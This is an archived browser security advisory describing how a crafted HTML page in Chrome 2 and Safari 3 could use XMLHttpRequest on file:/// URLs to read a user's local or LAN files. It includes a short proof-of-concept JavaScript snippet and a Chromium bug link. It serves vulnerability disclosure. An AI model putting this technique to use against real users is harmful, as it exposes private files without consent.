AOH :: HP Unsorted X :: BT-21109.HTM

XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3



XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3
XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3




.html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.

var method = "GET"
var URL = "file:///C:/argentina/bsas_junin.txt"
xmlhttp.open( method, URL, true)

This type of request is possible if file is on user local  in the user hard disk (CHROME2), in other browser I was able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3)


if (xmlhttp != null) {
	xmlhttp.open( method, URL, true)
	xmlhttp.onreadystatechange=function(){
	if (xmlhttp.readyState==4) {
           alert(URL + "\n\n" + xmlhttp.responseText)
		}
		}	 
	}

this is a valid operation javascript can read then xmlhttp.responseText, yes the file content.

After this you can do whatever you want whit the file.

note that you MUST know the file path!!

crafted by: federico.lanusse
pantera_bleed@hotmail.com 
federico.lanusse@clarolab.com 

company: clarolab QA team
yeah! lets rock Ateam!!

Chrome ISSUE, with attached POC.
http://code.google.com/p/chromium/issues/detail?id=13671 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.